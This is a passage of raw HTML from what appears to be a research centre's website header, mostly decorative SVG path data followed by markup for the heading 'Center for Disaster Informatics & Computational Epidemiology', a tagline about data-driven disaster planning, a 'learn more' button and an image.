d=\"M404.29,66.23l-2.42-.78c0,.48,0,1-.05,1.46a22.28,22.28,0,0,0,9,3c3.72.58,8.26.5,10.54,5,.64,1.26,2.67,1.7,3.61-.49l0,0c-2.22.08-4.06,0-2.63-3.16.4-.88.23-2.77-.39-3.2a2.09,2.09,0,0,0-.52-.25c-.41,0-.82-.12-1.22-.21-.64,0-1.32,0-1.94,0l-1.4,0-.37.27c-2.69,2.28-9.66,2-11.95-.66-.2-.22-.17-.64-.24-1a7.52,7.52,0,0,0,3.54.79,2.26,2.26,0,0,1-.21-2c.19-.78-1.11-1.93-1.73-2.91a2.57,2.57,0,0,0-.14-.61c-2.85-.2-3.59,1.14-3.81,2.86A3.89,3.89,0,0,1,404.29,66.23Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M421.42,67.77a4.27,4.27,0,0,0-1.22-.21C420.6,67.65,421,67.72,421.42,67.77Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M421.42,67.77a4.27,4.27,0,0,0-1.22-.21C420.6,67.65,421,67.72,421.42,67.77Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M404.54,67.21c2.29,2.64,9.26,2.94,11.95.66l.37-.27c-2.41.06-4.83.21-7.23.13a2.23,2.23,0,0,1-1.79-.7,7.52,7.52,0,0,1-3.54-.79C404.37,66.57,404.34,67,404.54,67.21Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M404.54,67.21c2.29,2.64,9.26,2.94,11.95.66l.37-.27c-2.41.06-4.83.21-7.23.13a2.23,2.23,0,0,1-1.79-.7,7.52,7.52,0,0,1-3.54-.79C404.37,66.57,404.34,67,404.54,67.21Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M404.29,66.23A3.89,3.89,0,0,0,402,64.38c0,.35-.07.71-.08,1.07Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M404.29,66.23A3.89,3.89,0,0,0,402,64.38c0,.35-.07.71-.08,1.07Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M398.39,72.46c1.45-.38,3-.49,4.64-.75l-1.86-3.45c-3,3.64-5.33,3.67-8.89.42a22.56,22.56,0,0,0-4.12-2.4C389,69.59,395.25,73.29,398.39,72.46Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1899.43,110.37a4.84,4.84,0,0,0-2.63,1.43,7.83,7.83,0,0,0,2.63-1.11Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1788.06,100.5c1.9-.27,3.93.29,5.9.52,3.39.4,6.78.86,10.17,1.23.38,0,.79-.49,1.21-.52a11.9,11.9,0,0,1,3.42,0,24,24,0,0,1,3.82,1.48c.32-.46.74-.79.8-1.17.32-2.1,1.85-2.36,3.2-1.6.59.33.8,2.25.44,3.13-.76,1.86-2.44,3.59-.39,5.47,2.55,2.34,10.5,1.49,13.12-1a5,5,0,0,1,3.69-1.39c6,1,6,1.16,8.38-4.58.12-.27.43-.45,1.08-1.11,1.41,2.23,2.65,4.31,4,6.3,1.77,2.59,2.83,2.52,4.39-.13.7-1.19,1.53-2.29,2.31-3.43l1.12.12,1.85,8.84c1.67-.23,3.16-.81,4.47-.54,2.45.51,4.64,1.26,6.68-1.11.52-.61,2.25-.65,3.22-.32,7.35,2.44,15.29,3.58,21.22,9.29a6.59,6.59,0,0,0,1.53.83c2.11-1,3.77-2.24,5.51-3l-.9-.45,1-1.4,0,0c1.17-.83,2.34-1.66,3.5-2.51.49-.36.94-.79,1.41-1.18-.47-.52-.84-1.34-1.41-1.51a7.28,7.28,0,0,0-3.42-.33v.32a7.83,7.83,0,0,1-2.63,1.11,8,8,0,0,0-1.56,2.31c0-.69-.07-1.38-.08-2.07-5,.32-10.51-2.38-14.93.57,4.42-3,10-.25,14.93-.57a21,21,0,0,0-.41-4.29,38.5,38.5,0,0,0-2.41-5.92l-.92,1.3a51.21,51.21,0,0,0-5.5-.55,2.76,2.76,0,0,0-2.16,1.12c-.33.66,0,1.7.15,2.56.22,1.54.48,3.07.72,4.6-2-.32-4-.6-6-1-.6-.12-1.12-.83-1.68-.85a8.2,8.2,0,0,1-7.45-5,8.36,8.36,0,0,0-1.19-1.93c-4.34.38-7.91.8-11.48.92-.8,0-1.6-1-2.45-1.55-2.23-1.3-4.53-2.48-6.7-3.87a11.48,11.48,0,0,1-2.06-2.26l-1.31.09-7.11,3.44c.51-1.71,1-3.16,1.39-4.61l-3.23,1c-1.26,2.74-3.89,2.28-5.58,1.44-2.47-1.24-4.46-3.43-6.66-5.22l-2.63.37c-.42.3-.85.59-1.28.88L1815,92l-1.3.24-3.86,2.42c-1.06,2.07-2.71,2.13-4.61,1.34l-2,.34c-1.4,2.37-2.54,1.9-3.54-.31l-4.15-5.71-.76-.53-1.31.27-1.31.91c-2.15,1.16-4.26,2.4-6.47,3.43-1.68.78-3.49,1.3-5.23,1.93C1782,99.51,1784.34,101,1788.06,100.5Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1705.46,85.81a4.38,4.38,0,0,1,2.31,1.83c.48.62.57,1.54,1.16,3.35l3.73-5.94c.35,2.51.61,4.36.86,6.22l.77.24c1-1.51,2-3,3.23-4.79,2.69,1.59,6.16,2.57,7.75,4.86,1.93,2.75,3.55,3.7,6.59,2.4,1.4,2.3,2.34,5.58,5.88,2.53.35-.3,1.47.34,2.24.5a8.85,8.85,0,0,0,8.53-3.59l-4-3.33-3,3h0c-.52,1.87-1.45,2.1-2.77.67l-.67-.18c-1-.54-2.47-.86-2.81-1.66-2.73-6.37-7.81-7.43-13.86-6.49-2.44.37-4.15,0-3.55-3.09a.36.36,0,0,0-.25-.27c-4-.29-7.86,2.62-12,.33-.9-.5-2.86,0-3.82.74-2.33,1.78-4.2,1.33-6.39-.17-.93-.65-2.32-.65-3.5-1-.5,1.42-1,2.84-1.79,5.11,3.6-.5,6.59-1,9.59-1.3A24.79,24.79,0,0,1,1705.46,85.81Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1616.21,78.62c2-2.87,4.61-3.18,6.76-.66,2.6,3.06,2.77,3,5.06-.82-1-.57-1.93-1.52-3-1.65-3.2-.39-6.44-.47-9.67-.68l-4.24,4.74C1613.32,81.87,1614.91,80.48,1616.21,78.62Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1609,78.85c.28.23.86.08,1.31.1-1.29-1.66-2.49-4.6-3.87-4.69-2.6-.16-5.36,1.18-7.91,2.24-.64.27-.72,1.85-1.06,2.83.69-.37,1.39-.7,2.06-1.09C1604,75.56,1605,75.63,1609,78.85Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1689.47,82.26c-2.45-1.14-4.89-2.32-7.36-3.4-.47-.2-1.11,0-1.65,0-2.38-.31-4.75-.66-7.12-1l-1.11.79,16.92,3.72C1689.25,82.37,1689.36,82.29,1689.47,82.26Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1779.28,96.53c-3-3.4-6-1.4-9,0C1772.54,98.87,1776.37,98.87,1779.28,96.53Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1594.13,82.33c1.61,0,3.09.11,2.72-2.21-1.14.14-2.4.66-3.4.36-2.12-.65-3.2,0-3.75,2C1591.18,82.43,1592.66,82.29,1594.13,82.33Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M533.93,38.55c1.78-.33,3.59-.56,5.33-1a4.91,4.91,0,0,0,2.4-1.38c2.58-3,3.41-3,5.28.44.31.57.66,1.12.52.89,5.77.28,10.93.33,16,.85,2.32.23,4.13.6,5.24-2.09a9.67,9.67,0,0,1,2.74-3.41c.48-.4,1.62,0,2.46,0,.06-1.14.11-2.28.22-4.4l-3.47,2.63c-.13-1.71-.22-3-.31-4.21l-2-2.13c-3.21.4-2.52,3-2.58,4.94-.06,2.22.13,4.84-2.28,5.46-3.08.79-6.62,1.46-9.56.67-3.29-.87-3.59-6.11-1.09-8.56.6-.59.84-1.54,1.41-2.19a3.94,3.94,0,0,1,2.84-1.43,49.65,49.65,0,0,0-1.49,6.3c-.08.67,1.28,2.2,1.62,2.1a4.61,4.61,0,0,0,2.82-1.94c.4-1-.58-2.52-.25-3.59.66-2.06,1.31-4.72,2.88-5.74,2.42-1.58,5.72-1.73,8.43-3,3.87-1.76,7.72-.72,11.6-.57h0c-.16-2.46,1.55-2.79,3.33-2.69,3,.16,6,.52,9,.8L607.9,11l2.8-1.25,1.3,0,0-1.26c-3.16.74-6.38,1.27-9.45,2.28-4.88,1.61-9.67,3.15-14.91,1.84a7,7,0,0,0-3.33.25c-8.14,2.16-16.26,4.42-24.41,6.56-3.71,1-7.51,1.62-11.2,2.67-2.72.77-5.24,2.36-8,2.84-3.36.58-4.53,2.07-4.5,5.41,0,1.23-1.49,3.42-2.49,3.54-2.88.32-3.1,2-3.37,4l3.69,1.58Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1069.52,43.37l6.19-1.24,1.31-.45,4-.58,4.89.68c4-1.88,4-1.87,5.69,2.55a30,30,0,0,0,1.2,2.79c3,5.86,3,5.82,9.09,4.29a3.72,3.72,0,0,1,2.5.41c3.12,1.85,6,3.88,4,8.29-.1.22.29.67.43,1l2.85-3c.73,1.58.37,2.94.81,4a30.58,30.58,0,0,0,3,4.62l2.47-2.29c-3.46.83-3.83.5-2.92-2.82a26.61,26.61,0,0,1,1.57-4.47c2.18-4.49.74-6.59-4.32-6.9a8.72,8.72,0,0,1-5.34-2.22c-4.86-5-4.74-5.09-9.11-.07-.12.14-.42.13-1.17.33a57.38,57.38,0,0,0-3.49-6.28,6.85,6.85,0,0,0-3.62-2.76,29,29,0,0,0-7.28-.17,55.42,55.42,0,0,0-6,.93c-2.17.37-4.32,1-6.51,1.12-3.65.3-7.51-.39-10.39,2.76a37.77,37.77,0,0,1,5.49-1.08A22.42,22.42,0,0,1,1069.52,43.37Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M617.44,10.24l4-.6c2.61,0,5.23,0,7.84,0,1.34,0,3.05.26,3.94-.43,2.59-2,4.75-1.78,6.83.48,1.62,1.76,2.72,1.95,4-.46,1.51-2.85,4.23-3.12,7.28-1.54a6,6,0,0,0,4.36.58c6.13-2.4,12.57-2.23,18.93-2.74,3.46-.56,7-1.81,10.21.74l4.74.62a15.85,15.85,0,0,1,2.84-.56c4.63-.14,9.26-.19,13.88-.27-1.36-.58-2.7-1.6-4.09-1.68C696,4,689.76,4.05,683.55,3.68c-9.12-.54-18.06,0-26.8,2.94-2.41.79-5,1-6-2.06-1.81.4-3.33.78-4.87,1.06-4.51.82-9,1.63-13.55,2.35-.83.13-1.74-.35-2.6-.31-5.24.23-10.47.54-15.7.83.25.56.5,1.13.74,1.7Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M493.05,53.3c1.63-.29,3.58,1.17,5.41,1.83l-4,3,5.83-.32c-.77-1.85-1.34-3.24-1.91-4.62-2.49-1.88-5-1.26-8-1.06-5.54.37-11.23-1.28-16.85-2.09l0-1.24L484,46.55a47.15,47.15,0,0,0-23.08,2.63,88.07,88.07,0,0,0,12.06,2.33C479.62,52.26,486.13,54.53,493.05,53.3Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M617.52,33.74l-2.9,2.16c4.85.88,4.8.88,4.91,5.68a45.67,45.67,0,0,0,.64,4.92c.26.28.53.56.79.85.41-.65,1.2-1.31,1.17-1.94-.11-2.44.58-3.63,3.32-3.92,2.18-.23,2.73-3.36,1.31-5.25C624.32,33,621,33.28,617.52,33.74Z\" transform=\"translate(0 0)\"\n opacity=\"0.6\"></path>\n <path d=\"M592,35.75c.83.74.73,2.5,1.25,4.78,1.89-.85,4.3-1.41,5.94-2.85,1-.83.64-3.09.83-4.27l3.15-3.29c-1.79,0-3.4-.16-4.42,2.16-.47,1.08-3.12,2.2-4.26,1.8-2.61-.91-4.76-1.43-7.06.56-.25.21-1.44-.91-2.25-1a7.84,7.84,0,0,0-2.46.46,45.78,45.78,0,0,0,5.58,1.79C589.46,36.1,591.3,35.16,592,35.75Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M535,51.31h4.2l4,.53,6.14.22,8.15,0c1.39-1.53,2.47-.9,3.44.5l-.07.12,2.68-.2c.05-.49.11-1,.16-1.47l-34.16-.94c.46.4.93.79,1.4,1.18Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M517.28,49.94l6.22.66,1.93.06L527.5,50l-19.06-2,1.41,1.82Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M597.32,44.41c-3.3.19-6.6.39-9.89.64-.23,0-.43.47-.64.73,2.5,2.16,7.06,1.78,11-.9C597.6,44.72,597.45,44.41,597.32,44.41Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M495.61,47.63c3.15.56,6.32,1.11,9.5,1.46.62.07,1.34-.72,2-1.11l-12.29-1.33C495.09,47,495.3,47.57,495.61,47.63Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M565,50.56c3.78-.16,7.57-.31,11.36-.5.1,0,.18-.37.28-.56C572.61,48.09,568.66,47.69,565,50.56Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1057.93,47.77c.24-1.13.47-2.26.71-3.39l-4.88,3.36,2.17.72Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M599,45.28c1.41,1,3.57.47,5.53-1.37C602.08,41.91,601,45.43,599,45.28Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1121.39,64.36l-2.2,0C1119.91,65.91,1120.64,65.94,1121.39,64.36Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M526.91,66.87l2.61.91,2.14,1.15,2,1.82,1.4-.44,2-1.44a1.48,1.48,0,0,1,.19-.57l.66-6.21a1.43,1.43,0,0,1-.16-.57l-4.71.66-1,.27-1.9,2.76c-.82-2.42-1.29-3.8-1.75-5.17l-.05-.07C524.76,61.66,526.48,64.39,526.91,66.87Z\" transform=\"translate(0 0)\"\n opacity=\"0.6\"></path>\n <path d=\"M699.28,46.12c3.9.2,5-.72,5.5-4.49l-.82-.25C701.9,42.43,699.31,43,699.28,46.12Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M637.78,32.05q-.85,2.46-1.7,4.92c1.48-2,3-1.49,4.48,0L642,34.88c0-.45,0-.9,0-1.35Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M18.44,71.94c-.93-2.4-3-4.37-4.54-6.54.79,2.21-6.73-1-13.9-4.05v8.19C7.73,71.3,20,76,18.44,71.94Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M227.49,59.55a14.62,14.62,0,0,1,5.39.15c3.79.67,7.5,2,11.3,2.29,7.86.56,15.75.58,23.63.85,1.79.06,3.59.2,5.36.43,2.28.29,4.53.71,6.79,1.08a25.57,25.57,0,0,1,3.07-.78c3.39-.47,6.81-.78,10.2-1.29,2.15-.33,2.83.77,3,2.6l1.31.32c5.86-3.59,12-2.37,18.3-1.54a78,78,0,0,1,15.47,4.16c2.66.92,6.07-.34,9.15-.61-.14-.18-.28-.52-.4-.51-5.7.44-11.06-.46-15.85-3.8-.08-.06-.22,0-.33,0-6.14-.46-12.22-1.2-17.88-3.9a4.73,4.73,0,0,0-2.35-.15c-4.42.5-8.83,1.16-13.27,1.57-3.8.35-6-1.15-7.51-4.46-.28-.61-1.05-1.43-1.54-1.4a2.21,2.21,0,0,0-1.5,1.47c-.38,1.81-.48,3.69-.76,6.12-2.94-.82-5.8-1.2-8.24-2.42-2.13-1.07-3.35-.79-5.11.57-1.29,1-3.9,2.11-4.71,1.52-2.88-2.1-5.68-1.35-8.74-1.16s-6-.46-9-.87c-1.75-.25-3.45-.88-5.2-1.13-5.63-.81-11.27-1.61-16.92-2.21-1.55-.16-3.18.41-4.77.64C219.93,58.68,223.34,60.44,227.49,59.55Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M107.68,50.62,109,50l1.34-.16h1.37l3.38.24,7.53.69c3.79-.37,7.58-.94,11.38-1,2.78-.09,5.59.74,8.37.6,4.39-.2,8.66-.6,12.82,1.52,1.39.71,3.31.41,5,.5,5.85.3,11.71.5,17.55.87,5.36.33,10.71.82,16.06,1.29,2,.17,4,.53,6,.67a12.84,12.84,0,0,0,2.58-.33c-3.2-.48-6.38-1.08-9.58-1.41-4-.42-8.2-.17-12.13-1-6.24-1.36-12.38-2.39-18.8-1.53a24.07,24.07,0,0,1-6.73-.53A4.51,4.51,0,0,1,152.65,49c-1.62-2-2.9-4.19-4.57-6.09a4.87,4.87,0,0,0-3.17-1.67c-.6,0-1.54,1.58-1.78,2.58-.85,3.6-2,4.58-5.7,3.95-3-.52-6.07-2.29-8.83.75-.3.32-1.29,0-2,0l-17.77,0c-2.55,0-5.1-.13-7.63.08s-4.86.75-7.29,1.15l11.69,1.71Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M360.25,69.74a19.45,19.45,0,0,0,14.27-2c.71-.37,1.78,0,2.68,0l6.27-.07,2.08-.58,1.19-.92,4.8-1.7c-1-1.37-1.64-3.69-3.93-1.23A12,12,0,0,1,385,64.85c-.33-1-.63-2-1-3a18.81,18.81,0,0,0-1.68-4.41,12,12,0,0,0-3.45-3.06c-1.13-.74-2.77-1.81-3.68-1.45s-1.92,2.22-2,3.47c-.16,3.27.3,6.5,4,8.14l-5.48,2.41L366,69.46l1.26-4.74c-4.21,3.49-8.38,3.43-12.54,2.69.26.7.53,1.4.79,2.09A18.31,18.31,0,0,1,360.25,69.74Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M348.81,67.74c2.05,1.76,4.37,1.82,6.69,1.76-.26-.69-.53-1.39-.79-2.09-1.83-.33-3.65-.78-5.48-1.14-.8-.15-1.81.75-2.73,1.16C347.29,67.52,348.32,67.32,348.81,67.74Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M398.14,57.66c-1.34,1.74-2.11,3.92-3.14,5.9l-.21.18.13.24,4.18-3.2,1.3-.76a16.63,16.63,0,0,0,1.42-3.64c.68-4.85,3.49-7,8.2-6.2.6.09,1.37-.88,2.06-1.36-.95-.27-1.94-.86-2.84-.74-3.33.45-5.75-.55-7.18-3.7a12.14,12.14,0,0,0-1.77-2.05c-2.86,6.11-7.58.56-11.51,2.26a21.74,21.74,0,0,0,5.76,3.5C400,50.22,401.48,53.3,398.14,57.66Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M18,59.82c-3.68-.16-5.72,1.74-4.66,4.33Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1345.25,39.33c.3,0,.55.88.77,1.37.58,1.23,1.13,2.47,1.69,3.7l2.78-5.82-7-6-.67.1C1342.29,35.36,1339.64,38.82,1345.25,39.33Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1348.71,56.82c1.07,2,1.79,1.74,3.33.61.7-.52,2.73-.57,3-.14,2.09,3.45,6.52,5.43,6.51,10.21a2.57,2.57,0,0,0,.77,1.48c4,4.4,9.59,5.64,14.78,7.72-2.36-2.43-1.84-7-6.08-8.1-.31-.08-.28-1.2-.54-1.77a4.87,4.87,0,0,0-1.22-2c-2.44-1.76-3.56-4.63-2.31-7.25.46-1,1.66-1.6,2.52-2.39a10.27,10.27,0,0,1,1.53,2.56c1.57,6.2,2.6,7.28,7.45,7.5l.09,5.57,1.23,0c.27-1.59.53-3.18,1-5.86,3.67,4.78,7.64,5.42,12,3.82.32-2.42.6-4.58.9-6.79l-2.77-.25c2.64-2.3,2.94-6.83,6.84-7.06-.26,2.92-.5,5.68-.78,8.8,1.51-.67,2.58-1.51,3-1.26,2.8,1.75,4.12.21,5.78-1.86,1.06-1.32,2.8-1.86,3.72.87.47,1.39,2.2,3.53,3,3.39a24.34,24.34,0,0,0,7.85-3c.78-.44.74-2.47.89-3.8s.12-2.9.17-4.35l-4.43-3.18-2.82,4.13c-2.88-.62-5.19-1.4-7.54-1.54s-5.25,1.11-7.38.33c-4-1.47-7.74-1.09-12.06.48a60.15,60.15,0,0,0-1.34-6.22,5,5,0,0,0-2-2.32,8.13,8.13,0,0,0-2.6-.63c-4.54-1.08-9-2-13.14,1.33a1.15,1.15,0,0,1-.59.32c-1,0-2.67.35-3-.14a5.71,5.71,0,0,1-.79-3.75,3,3,0,0,1,2.19-1.91c2.28,0,3.34-1.09,3-3.06s-1-4.09-3.92-3.47l1,2.41c-5.2,4-5.45,7-1.59,12.2a7.69,7.69,0,0,1,1.12,4.78,16.93,16.93,0,0,1-2,6.45c-.66-2.71-1.33-5.41-2.15-8.73a12.13,12.13,0,0,1-2,2.32c-.81.54-2,1.24-2.76,1-3.9-1.42-7.57-.73-11.24.69C1346.42,55.58,1348.18,55.86,1348.71,56.82ZM1375,55.71l3.17.95c1.82-1.8,2.31-3.65,1.13-6.07-.37-.74.35-2,.57-3,1,.58,2.29.94,3,1.79a45.93,45.93,0,0,1,3.11,5.31c-2.2,5.44-3.26,6.29-5.41,4.5l-3.89,2.24-2.7-4.92Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1429.65,59.51l3.06-1.52c.23,2.5-1.93,5,1.42,6.94l1.95-4.61,6.73,4.13,2.06-6c2.61,1.08,5.58,1.46,7.18,3.14,2.69,2.82,2.31,3.16,4.89.34a8.88,8.88,0,0,1,1.73-1.1c-.55,1.79-1,3.11-1.36,4.43l.72.38,3.19-1.9,2.57,3.17,3.38-4c2.19,1.56,3.36.64,4.3-1.57a3.45,3.45,0,0,1,2.45-1.77c.65,0,2,1.33,1.92,1.9-.14,1-1.18,1.76-1.85,2.62-.24.31-.52.58-.8.9,2.72,2.6,3.66-1,5.56-1.39l1.82,2.69c3.6-1.56,7.17-2.85,10.48-4.63,2.13-1.15,3.15-.7,4.45,1.1,1.48,2.05,3.51,3.51,7.27,3.65l-3.55-4.65a38.14,38.14,0,0,1,3.73,1.53c4.47,2.55,6.71,2,9.73-2.09a4.21,4.21,0,0,1,2.82-1.14,11.3,11.3,0,0,1,3,.6c1.52.3,3.49.1,4.44,1,.75.71.27,2.73.34,4.33a9.11,9.11,0,0,0,1.13-.48c4.42-2.68,5-2.61,8.87,1a3,3,0,0,0,5-1.65,28.62,28.62,0,0,0,.39-3.35c-1.18-.17-2.38-.28-3.54-.54-.94-.21-2.19-.33-2.69-1-2.81-3.64-7.42-3-11-4.73-.53-.25-1.77,1.16-2.76,1.63-1.19.56-2.6,1.53-3.68,1.29-4.88-1.06-6.15-.72-8.55,3.33l-5.16-.84c1.76-1.94,3.09-3.39,4.34-4.75-1.52-2.92-3.62-2.05-5-.87s-1.88,3.11-3,5.11c.11-3.16-.94-4.58-4.1-4.6-2.37,0-4.7-1.27-7.09-1.67a11.57,11.57,0,0,0-5,.06c-5.69,1.72-11.31,3.2-17.18.85a3.25,3.25,0,0,0-1.64-.14c-4.84.8-9.6,1-14.13-1.42a2.26,2.26,0,0,0-1.89-.12c-3.88,2.49-7.63,1.6-11.47-.11-.83-.37-2.19-.7-2.78-.29a4.61,4.61,0,0,1-5,.26c-1.55-.71-3.2-1.21-5.14-1.92-.25.81-.51,1.61-.76,2.42C1424.18,52.92,1427.59,55.41,1429.65,59.51Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1551.42,67.2c.56-1.29,1-2.54,1.61-3.69,1-1.93,4.37-2.72,5.42-1.28,2.92,4,7,4.8,11.86,4.8-.43-1.29-.75-2.21-1-3l5.34-4.25c2.54,2.71,4.76,5.31,7.28,7.57.67.61,2.35.44,3.42.14a5,5,0,0,0,1.9-1.28c1.89.52,3.92,1.38,4.11,1.08,1.62-2.56,5.43-3.51,5.47-7.21-2.48-.1-5.16-.84-7.4-.15-2.72.84-4.89.35-7.47-.28a38,38,0,0,0-9.55-.55c-2.6,0-5.18.76-7.78.85-3.25.12-6.57-.48-9.76,0-2.3.31-3.86.26-5.24-1.75a3.27,3.27,0,0,0-2.34-.91c-1.65,2.19-3.6,3.28-6.38,2.48-.1,0-.36.5-.55.77l1,6.9C1544.78,64.68,1547.93,65.4,1551.42,67.2Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1639.23,56.13l5,.11c2.64,6.34,6.6,11.29,14.84,10.85-.46,4.49,2,5.65,5.79,5.51,1.84-.07,3.7.16,5.55.25l1.69,4.38,1.21.06,1.76-.72c-.47-1-1-2-1.39-3-1.48-4-2.47-4.47-6.42-3.34a9.44,9.44,0,0,1-2.19.11c-.91-5.38-1.74-6.27-5-5.53-2.64.61-4-.91-3.32-3.67,1.13-4.46.57-5-4.39-5.07-2.74,0-5.27-.5-7-3.14-2.47-3.86-3.72-4.21-8.1-2.84l3.32,1.35Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1623.78,53.05c3.4-.23,6.83,0,10.11,0l2.21-3.28c-.78-.31-1.59-.93-2.34-.86-5,.43-10,1-15,1.55C1619.85,52.5,1621.42,53.22,1623.78,53.05Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1361.67,35.06c-2.1-.64-6.14,1-7,2.88C1357.09,37.24,1360.28,38.33,1361.67,35.06Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1341,50.21l1.76,2.4c1.6-.91,3.2-1.81,4.8-2.73,1.29-.74,2.32-1.54.54-2.86l-6.89,2.85h0Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1339.42,50.35l1.6-.14.21-.34-1.82-.1Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1341.23,49.87h0l-.21.34Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1341.23,49.87h0l-.21.34Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n </svg>\n </div>\n <div class=\"h-section-grid-container h-navigation-padding h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"22-h25\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-213 style-local-22-h25 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-214-outer style-local-22-h26-outer\">\n <div data-colibri-id=\"22-h26\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-214 style-local-22-h26 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-id=\"22-h27\" class=\"h-global-transition-all h-heading style-215 style-local-22-h27 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-215 style-local-22-h27\">\n <!---->\n <!---->\n <h3 class=\"\">Center for Disaster Informatics & Computational Epidemiology</h3>\n </div>\n </div>\n <div data-colibri-id=\"22-h28\" class=\"h-lead h-text h-text-component style-216 style-local-22-h28 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Enabling Data-Driven Disaster Assessment & Planning\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"22-h35\" class=\"h-x-container style-864 style-local-22-h35 position-relative h-element\">\n <!---->\n <div class=\"h-x-container-inner style-dynamic-22-h35-group style-864-spacing style-local-22-h35-spacing\"><span class=\"h-button__outer style-865-outer style-local-22-h36-outer d-inline-flex h-element\"><a h-use-smooth-scroll=\"true\" href=\"https://gsudice.dataconn.net/?page_id=126\" data-colibri-id=\"22-h36\" class=\"d-flex w-100 align-items-center h-button justify-content-lg-center justify-content-md-center justify-content-center style-865 style-local-22-h36 position-relative\"><!----><!----> <span>learn more</span></a>\n </span>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-220-outer style-local-22-h29-outer\">\n <div data-colibri-id=\"22-h29\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-220 style-local-22-h29 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-id=\"22-h30\" class=\"d-block style-221 style-local-22-h30 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/02/unsplash.jpg\" class=\"wp-image-258 style-221-image style-local-22-h30-image\">\n <div class=\"h-image__frame h-image__frame_shadow style-221-frameImage style-local-22-h30-frameImage\"></div>\n </div>\n </div>\n 